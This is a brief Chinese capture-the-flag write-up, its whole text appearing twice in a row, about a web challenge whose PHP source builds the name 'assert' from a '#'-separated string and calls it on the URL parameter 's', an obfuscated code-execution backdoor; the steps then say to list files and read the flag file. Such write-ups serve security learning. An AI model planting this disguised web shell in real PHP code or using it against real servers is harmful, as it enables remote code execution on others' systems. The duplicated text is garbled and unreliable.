参考:
打开场景后,发现啥也没有
分析题目给的描述:
<?php
$poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>
assert函数:
($_GET[‘s’]),URL中传入一个s参数
看下有什么文件
查看flag文件
参考:
打开场景后,发现啥也没有
分析题目给的描述:
<?php
$poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>
assert函数:
($_GET[‘s’]),URL中传入一个s参数
看下有什么文件
查看flag文件